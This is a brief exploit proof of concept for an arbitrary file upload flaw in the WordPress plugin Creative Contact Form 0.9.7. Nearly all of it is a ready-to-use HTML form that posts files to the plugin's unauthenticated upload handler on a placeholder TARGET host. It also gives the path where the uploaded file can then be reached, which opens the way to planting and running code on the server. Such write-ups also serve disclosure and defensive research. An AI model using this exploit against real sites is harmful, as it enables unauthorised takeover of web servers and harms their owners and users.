WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

## PoC
Trigger a file upload

<form method="POST" action="
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Then the file is accessible under
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME ==========================================================